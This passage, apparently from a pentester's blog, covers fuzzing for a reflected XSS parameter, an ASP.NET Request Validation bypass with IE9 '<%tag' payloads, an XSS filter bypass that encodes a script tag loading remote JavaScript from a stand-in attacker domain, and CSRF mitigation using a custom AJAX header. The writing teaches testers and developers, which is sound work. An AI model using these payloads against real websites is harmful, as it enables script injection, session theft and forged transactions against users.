So to find out if this debug output is populated by any query string parameter, we can use wfuzz.

First we need to determine how many bytes come back from the page on a normal request:

$ curl 'http://rob-sec-1.com/test/?' 1>/dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    53  100    53    0     0     53      0  0:00:01 --:--:--  0:00:01   289

Here we can see that this is 53. From there, we can configure wfuzz to try different parameter names and then look for any responses that have a size other than 53 characters. Here we’ll use dirb’s common.txt list as a starting point:

$ wfuzz -w /usr/share/wordlists/dirb/common.txt --hh 53 'http://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>'
********************************************************
* Wfuzz 2.2.3 - The Web Fuzzer                         *
********************************************************

Target: HTTP://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>
Total requests: 4614

==================================================================
ID	Response   Lines      Word         Chars          Payload    
==================================================================

02127:  C=200      9 L	       8 W	     84 Ch	  "item"

Total time: 14.93025
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 309.0369

Well, whaddya know, looks like we’ve found the parameter!

Copying /test/?item=<script>alert("xss")</script> into Firefox gives us our alert:

xss
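The same idea - request each candidate parameter name with the payload and flag any response whose size differs from the 53-byte baseline - takes only a few lines of Python (the target URL and wordlist path are illustrative):

```python
import urllib.parse
import urllib.request

PAYLOAD = '<script>alert("xss")</script>'
BASELINE = 53  # byte size of a normal response

def candidate_url(base: str, param: str) -> str:
    """Build a probe URL with the payload in a single named parameter."""
    return base + "?" + urllib.parse.urlencode({param: PAYLOAD})

def fuzz(base: str, wordlist_path: str):
    """Yield (param, size) for responses differing from the baseline size."""
    with open(wordlist_path) as wordlist:
        for param in (line.strip() for line in wordlist if line.strip()):
            with urllib.request.urlopen(candidate_url(base, param)) as resp:
                size = len(resp.read())
            if size != BASELINE:
                yield param, size

if __name__ == "__main__":
    for hit in fuzz("http://rob-sec-1.com/test/",
                    "/usr/share/wordlists/dirb/common.txt"):
        print(hit)  # candidate reflected parameter and response size
```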

ASP.NET Request Validation Bypass

14 October 2017 at 17:49

…and why you should report it (maybe).

This post is regarding the .NET Request Validation vulnerability, as described here. Note that this is nothing new, but I am still finding the issue prevalent on .NET sites in 2017.

Request Validation is an ASP.NET input filter.

This is designed to protect applications against XSS, even though Microsoft themselves state that it is not secure:

Even if you’re using request validation, you should HTML-encode text that you get from users before you display it on a page.

To me, that seems a bit mad. If you are providing users of your framework with functionality that mitigates XSS, why do users then have to do the one thing that mitigates XSS themselves?

Microsoft should have ensured that all .NET controls properly output things HTML encoded. For example, unless the developer manually output-encodes the data in the following example, XSS will be introduced.

<asp:Repeater ID="Repeater2" runat="server">
  <ItemTemplate>
    <%# Eval("YourField") %>
  </ItemTemplate>
</asp:Repeater>

The <%: syntax introduced in .NET 4 was a good move for automatic HTML encoding, although it should have existed from the start.

Now to summarise, normally ASP.NET Request Validation blocks any HTTP request that appears to contain tags. e.g.

example.com/?foo=<b> would result in the error A potentially dangerous Request.QueryString value was detected from the client, presented on a nice Yellow Screen of Death.

This is to prevent a user from inserting a <script> tag into user input, or from trying some other form such as <svg onload="alert(1)" />.

However, the flaw in this is that <%tag is allowed. This is a quirky tag that only works in Internet Explorer 9. I originally thought it required IE9 standards mode rather than quirks mode. Edit: It works in either mode; however, if the page is in quirks mode then it requires user interaction (like a mouseover). For example, the existing page can be seen to be in quirks mode as it contains the following doctype and meta tag (although in tests only the meta tag seems to be required):

<!doctype html>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">

I’ve setup an example here that you can try in IE9. The code is as follows:

<!doctype html>
<html>
<head>
	<meta http-equiv="X-UA-Compatible" content="IE=Edge">
</head>
<body>

	<%tag onmouseover="alert('markitzeroday.com')">Move mouse here

</body>
</html>

Loading your target page in Internet Explorer 9 and then viewing developer tools will show you whether the page is rendered in quirks mode.

Moving the mouse over the text gives our favourite notification from a computer ever - that which proves JavaScript execution has taken place:

XSS Proof

Edit: Actually this does work in quirks mode too using a CSS vector and no document type declaration:

<html>
<head>
</head>
<body>

        <%tag style="xss:expression(alert('markitzeroday.com'))">And you don't even have to mouseover

</body>
</html>

Example Warning: This is a trap, and you may need to hold escape to well… escape.

Now, you should report this in your pentest or bug bounty reports if you can prove JavaScript execution in IE9, either stored or reflected. Unfortunately, bypassing Request Validation is not enough to report in itself, as XSS is an output vulnerability, not an input one.

Note that it is important that this is reported, even though it affects Internet Explorer 9 only. The reasons are as follows:

  • Some organisations are “stuck” on old versions of Internet Explorer for compatibility reasons. Their IT department will not upgrade the browsers network wide as a piece of software bought in 2011 for £150,000 will not run on anything else.
  • By getting XSS with one browser version, you are proving that adequate output encoding is not in place. This shows the application would be vulnerable should it also use data from other sources, e.g. user input from a database shared with a non-ASP.NET app, or an app that is written properly so as not to rely on ASP.NET Request Validation.
    • Granted you can only test inputs from your “in-scope” applications and prove that those inputs have a vulnerable sink when output elsewhere, although chances are that if one part of the application is vulnerable then other parts will be and you can alert your client to this possibility quite literally.

Note also that Request Validation inhibits functionality. Much like my post on functional flaws vs security flaws, preventing a user from entering certain characters and then resolving this by issuing an HTTP 500 response results in a broken app. If such character sequences are not allowed, you should alert the user in a friendly way and give them a chance to fix it first, even if this is only client-side validation. Also, any automated processes that include <stuff in what they POST or GET to your application may unexpectedly fail.

The thing that Microsoft got wrong with Request Validation is that XSS is an output problem, not an input problem. The Microsoft article linked above is still confused about this:

If you disable request validation, you must check the user input yourself for dangerous HTML or JavaScript.

Of course, if you want a highly secure site because your risk appetite is low, then do validate user input. Don’t let non-alphanumeric characters be entered if they are not needed. However, the primary mitigation for XSS is output encoding. This is the act of changing characters like < to &lt;. Then it doesn’t matter if this is output to your page, as the browser won’t execute it, and therefore no XSS.
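In most languages output encoding is a one-liner; for example, in Python:

```python
import html

# HTML-encode untrusted input before writing it into a page
user_input = '<svg onload="alert(1)" />'
print(html.escape(user_input))  # &lt;svg onload=&quot;alert(1)&quot; /&gt;
```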

So as a pentester, report it if IE9 shows the alert, even if IE9 should be killed with fire. As a developer, turn Request Validation off and develop your application to HTML encode everywhere (don’t output into JavaScript directly - just don’t). If you need “extra” security, prevent non alphanumerics from being inserted into fields yourself through server-side validation.

XSS Without Dots

26 July 2017 at 20:02

A site that I discovered was echoing everything on the query string and POST data into a <div> tag.

e.g. example.php?monkey=banana gave

<div>
monkey => banana
</div>

I’m guessing this was for debugging reasons. So an easy XSS with

example.php?<script>alert(1)</script> gave

<div>
<script>alert(1)</script>
</div>

So I thought rather than just echoing 1 or xss I’d output the current cookie as a simple POC.

However, things weren’t as they seemed:

example.php?<script>alert(document.cookie)</script> gave

<div>
<script>alert(document_cookie)</script>
</div>

Underscore!? Oh well, I’ll just use an accessor to access the property:

example.php?<script>alert(document['cookie'])</script>. Nope:

<div>
<script>alert(document[
</div>

So I thought the answer was to host the script on a remote domain:

example.php?<script src="//attacker-site.co.uk/sc.js"></script>:

<div>
<script_src="//attacker-site_co_uk/sc_js"></script>
</div>

Doh! Two problems….

A quick Google gave the answer: use %0C for the space:

example.php?<script%0Csrc="//attacker-site.co.uk/sc.js"></script>

And then to get the dots, we can simply HTML encode them as we are in an HTML context:

example.php?<script%0Csrc="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>

which percent encoded is of course

example.php?<script%0Csrc="//attacker-site%26%2346%3bco%26%2346%3buk/sc%26%2346%3bjs"></script>

And this delivered the goods:

<div>
<script src="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>
</div>

which the browser reads as

<script src="//attacker-site.co.uk/sc.js"></script>

And dutifully delivers our message box:

Alert
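For reference, the chain of encodings above can be reproduced with Python’s standard library (the attacker domain is illustrative):

```python
import html
import urllib.parse

src = "//attacker-site.co.uk/sc.js"

# HTML-encode the dots so the application never receives a "."
entity_encoded = src.replace(".", "&#46;")
print(entity_encoded)  # //attacker-site&#46;co&#46;uk/sc&#46;js

# Percent-encode the entities for use in the query string
print(urllib.parse.quote(entity_encoded, safe="/"))

# The browser decodes the entities back to dots when parsing the attribute
print(html.unescape(entity_encoded))  # //attacker-site.co.uk/sc.js
```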

CSRF Mitigation for AJAX Requests

29 June 2017 at 11:34

To start with, a quick recap on what Cross-Site Request Forgery is:

  1. User is logged into their bank’s website: https://example.com.
  2. The bank website has a “money transfer” function: https://example.com/manage_money/transfer.do.
  3. The “money transfer” function accepts the following POST parameters: toAccount and amount.
  4. While logged into https://example.com the user receives an email from a person they think is their friend.
  5. The user clicks the link inside the email to access a cat video: https://attacker-site.co.uk/cats.htm.
  6. cats.htm whilst displaying said cat video, also makes a client-side AJAX request to https://example.com/manage_money/transfer.do POSTing the values toAccount=1234 and amount=100 transferring £100 to the attacker’s account from the victim.

Quick POC here that only POSTs to example.com and not your bank. Hopefully your bank already has CSRF mitigation in place. View source, developer console and Burp or Fiddler are your friends.

There’s a common misconception that websites can’t make cross-domain requests to other domains due to the Same Origin Policy. This could be due to the following being displayed within the browser console:

CORS Error

However, this is not the case. The request has been made; the browser message is telling you that the current origin (https://attacker-site.co.uk) simply cannot read any of the returned data from the cross-domain request. However, unlike an XSS attack, it doesn’t need to. The request has been made, and because the user is logged into the bank and therefore has a session cookie, this session cookie has been sent to the bank site, authorising the transaction.

Quick Demo

Simulate the bank issuing a session cookie by creating our own in the browser:

Cookie Setup

Note we’ll set the Secure and HttpOnly flags to show these have no effect on CSRF.

Visit the website:

Attacker Site CATS!

The following request is sent, note our session cookie is included:

Burp Request

Therefore as far as the web application is concerned, this is a legitimate request from the user to transfer the money despite the browser returning Cross-Origin Request Blocked. Only the response is blocked, not the original request.

AJAX Mitigation

If the target application has no CSRF mitigation in place, the above works for both AJAX requests and traditional form POSTs. This can be mitigated using the traditionally recommended Synchronizer Token Pattern. This involves creating a random, unpredictable token (in addition to the session token held in the cookie) and storing this server-side as a session variable. When a POST is made, this anti-CSRF token is also sent, but using any mechanism apart from cookies. This means that the anti-CSRF token will not be automatically included from the browser should the user follow a dodgy link that makes its own cross-domain request. CSRF averted.
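A minimal sketch of the Synchronizer Token Pattern, with a plain dict standing in for server-side session storage (a real application would use its framework’s session):

```python
import hmac
import secrets

sessions = {}  # stand-in for server-side session storage

def issue_csrf_token(session_id: str) -> str:
    """Create an unpredictable token and remember it server-side."""
    token = secrets.token_urlsafe(32)
    sessions[session_id] = token
    # Embed in a hidden form field or custom header - never a cookie
    return token

def check_csrf_token(session_id: str, submitted: str) -> bool:
    """Compare the submitted token against the stored one in constant time."""
    expected = sessions.get(session_id, "")
    return hmac.compare_digest(expected, submitted)
```

A legitimate POST echoes the token back and passes the check; a forged cross-domain request cannot know it and fails.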

But what if there was another way? One little known way is to include a custom header, such as X-Requested-With, as I answered here.

Basically:

  1. Set the custom header in every AJAX request that changes server-side state of the application. e.g. X-Requested-With: XMLHttpRequest.
  2. In each server-side method handler, ensure a CSRF check function is called.
  3. The CSRF function examines the HTTP request and checks that X-Requested-With: XMLHttpRequest is present as a header.
  4. If it is, it is allowed. If it isn’t, send an HTTP 403 response and log this server-side.
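The check itself is trivial; here is a framework-agnostic sketch (the header lookup is shown case-sensitively for brevity - real frameworks expose headers case-insensitively):

```python
def csrf_check(headers: dict) -> bool:
    """Allow state-changing requests only when the AJAX marker is present.

    A browser will not attach this header to a cross-domain request
    without a CORS preflight, so its presence implies same-origin AJAX.
    """
    return headers.get("X-Requested-With") == "XMLHttpRequest"

# In every "unsafe" handler:
#   if not csrf_check(request_headers):
#       respond with HTTP 403 and log the attempt server-side
```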

Many JavaScript frameworks such as jQuery will automatically send this header along with any AJAX requests. This header cannot be sent cross-domain:

  1. Any attempt to do so with a modern browser will trigger a CORS preflight request.
  2. Older browsers (think IE 8 and 9) can send cross-domain requests, but custom headers are not supported at all.
  3. Very old browsers cannot send cross-domain AJAX requests at all.

What is a Preflight?

So, referring to the above, old browsers couldn’t make cross-domain requests at all via AJAX. Therefore, you may come across an old website that checks for a custom header server-side so that it knows a request is an AJAX request. Now, the web is developed on the basis of “no breaking changes”. Therefore any new technologies introduced into the browser should not force websites to update themselves in order to continue working (why not visit the World Wide Web - apparently the world’s first website). This goes for functionality as well as security.

Therefore, suddenly allowing browsers to send cross-domain headers could break security if a site relies on this for CSRF mitigation. This scenario covers both points 2 and 3.

So that leaves 1, CORS (Cross-Origin Resource Sharing). CORS is a mechanism that weakens security. Its aim is to allow sites that trust one another to break the Same Origin Policy and read each other’s responses. e.g. api.example.org might allow example.org to make a cross-domain request and read the response in the browser, using the user’s session cookie as authorisation.

In a nutshell, CORS does not prevent anything from happening that used to be possible. For example, a cross-domain POST using <form method="post"> has always been allowed, so CORS allows any AJAX request that results in a previously possible HTTP request to be made without a preflight request; this has always been possible on the web, so allowing AJAX to do it as well does not introduce any extra risk. However, a request with custom headers causes the browser to automatically send a request to the endpoint using the OPTIONS verb. If the server-side application recognises the OPTIONS request (i.e. it is CORS aware), it will reply with a header showing which headers will be allowed from the calling domain.

Here you can see the attempt to send X-Requested-With in a cross-domain POST results in an OPTIONS request requesting this header be allowed, rather than the actual request. This is the preflight.

OPTIONS verb

If the server-side is not explicitly configured to allow this (i.e. no Access-Control-Allow-Origin to allow the domain and no Access-Control-Allow-Headers to allow the custom header):

OPTIONS response

The header is not allowed because our example.com domain is not configured for CORS.

Therefore if CORS is not allowing the attacker’s domain to send extra headers, this mitigates CSRF.

Will This Work?

What To Look For When Pentesting

The above will only work if the server-side application verifies that the custom header X-Requested-With is present in the request. As a pentester you should verify that every potential CSRF vulnerability you discover is actually exploitable. Burp Suite allows this via right clicking an item then clicking Engagement tools > Create CSRF PoC. Doing so may reveal one of two things:

  1. If you weren’t aware of the above, you may find a POST request that first appeared vulnerable to CSRF (due to the absence of tokens) but is in fact protected by the header check.
  2. If, after having read this post, you find an AJAX request that sends X-Requested-With: XMLHttpRequest, you may discover that removing this header still causes the “unsafe” action to take place server-side, in which case the request is vulnerable.

What To Do As A Developer

This may be a good short-cut if your server-side language of choice does not support server-side variables, or if you do not want the extra overhead of storing an additional token per user session. However, make sure that the presence of the HTTP request header is verified for every handler that makes a change of state to your application - i.e. “unsafe” requests as defined by the HTTP RFC.
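As a minimal sketch of that server-side check, using only the Python standard library (the /transfer endpoint and port are illustrative, not from any real application):

```python
# Reject state-changing requests that lack the X-Requested-With header.
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading

class CsrfHeaderCheckHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Consume the request body so the connection stays well-behaved.
        length = int(self.headers.get("Content-Length", 0))
        self.rfile.read(length)
        # An "unsafe" (state-changing) request must carry the custom header.
        # A cross-domain <form> post cannot add it, and without CORS approval
        # a cross-domain AJAX request cannot add it either.
        if self.headers.get("X-Requested-With") != "XMLHttpRequest":
            self.send_response(403)
            self.end_headers()
            self.wfile.write(b"rejected: possible CSRF")
            return
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"state changed")

    def log_message(self, fmt, *args):
        pass  # keep example output quiet

def serve_in_background(port):
    server = HTTPServer(("127.0.0.1", port), CsrfHeaderCheckHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

The important point is that the check runs on every handler that changes state; applying it to only some endpoints leaves the rest exposed.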

Remember, this only works for AJAX requests. If your application has to fall back to full HTML form submissions when JavaScript is disabled, then this will not work for you. Custom headers cannot be sent via <form> tags.

Conclusion

This is a useful, easy-to-implement mitigation for CSRF. Although an attacker can easily add a custom header themselves (e.g. using Burp Suite), they can only do this to their own requests, not to those of the victim, as required in a client-side attack. There were vulnerabilities in Flash that allowed a custom header to be added to a cross-domain request via a second attacker-controlled site that served a permissive crossdomain.xml. Unlike HTML, Flash requires a crossdomain.xml file for any cross-domain request, even those that are write-only, such as CSRF. The trick was for the attacker to issue a 307 HTTP redirect from their second domain to the victim website; the bug in Flash carried the custom header over from the original request. However, as Flash is moribund, and this was a bug, I would say it is generally safe for most sites to rely on the presence of the header as a mitigation. If the risk appetite for the application in question is low, go with token mitigation instead - or as well: Defence-In-Depth.

Note that the Flash bug was fixed back in 2015.
